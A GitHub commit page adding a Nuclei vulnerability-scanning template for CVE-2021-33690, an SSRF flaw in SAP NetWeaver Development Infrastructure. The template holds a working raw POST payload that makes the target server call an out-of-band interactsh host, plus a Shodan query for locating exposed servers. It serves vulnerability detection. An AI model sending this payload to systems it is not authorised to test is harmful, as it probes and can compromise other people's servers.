-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #8614 from projectdiscovery/CVE-2021-33690
Create CVE-2021-33690.yaml (SAP NetWeaver Development Infrastructure - SSRF) 🔥
- Loading branch information
Showing
1 changed file
with
48 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
id: CVE-2021-33690 | ||
|
||
info: | ||
name: SAP NetWeaver Development Infrastructure - Server Side Request Forgery | ||
author: DhiyaneshDK | ||
severity: critical | ||
remediation: Apply the latest firmware update provided by the vendor to mitigate this vulnerability. | ||
description: | | ||
Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet. | ||
reference: | ||
- https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33690 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H | ||
cvss-score: 9.9 | ||
cve-id: CVE-2021-33690 | ||
cwe-id: CWE-918 | ||
epss-score: 0.0011 | ||
epss-percentile: 0.4388 | ||
cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 1 | ||
verified: true | ||
shodan-query: html:"SAP NetWeaver" | ||
vendor: sap | ||
product: netweaver_development_infrastructure | ||
tags: cve,cve2021,oast,ssrf,sap | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /tc.CBS.Appl/tcspseudo HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
CBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "dns" | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "Could not connect to the CBS" |